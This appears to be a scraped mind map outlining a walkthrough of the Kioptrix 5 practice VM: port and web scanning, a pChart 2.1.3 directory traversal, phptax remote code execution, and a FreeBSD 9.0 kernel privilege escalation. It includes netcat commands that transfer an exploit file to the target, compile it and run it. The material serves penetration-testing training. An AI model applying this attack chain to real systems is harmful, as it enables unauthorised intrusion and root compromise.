Please enable JavaScript.
Coggle requires JavaScript to display documents.
Kioptrix5 (Scanning/Vuln/Enum (lets try to see apachae config file (php…
Kioptrix5
Scanning/Vuln/Enum
Vulnerability Searching
in pChart 2.1.3
its vulnerable to Directory traversal
We found pChart 2.1.3 on that URL
Directory structure is diff
its freeBSD
Found a URL in meta on index page
unable to access 8080
Scanning
|
web-server scanning
nikto -h ip
nmap full scan
80 / 8080
dirb ip
lets try to see apachae config file
php LFI vuln dir traversal attack
success
Discovering
nmap -sn ip
8080 is running under different user agent
Gaining Access
Exploiting Vuln
set up listner
Vuln searching
its vuln to remote code execution
Got shell
found phptax running
Local Enum
free bsd9.0
no users
no wget
no python
accessing ip:8080
Getting Root
open connection on target
nc -nv [host-ip] [port] > exploit.c
set up a listener
nc -lvp 1234 < exploit.c
compile exploit; gcc exploit.c
put exploit in a file
use nc to send file to target
./a.out
Vuln Searching
freebsd9 is vuln to kernel priv esc
Got Root
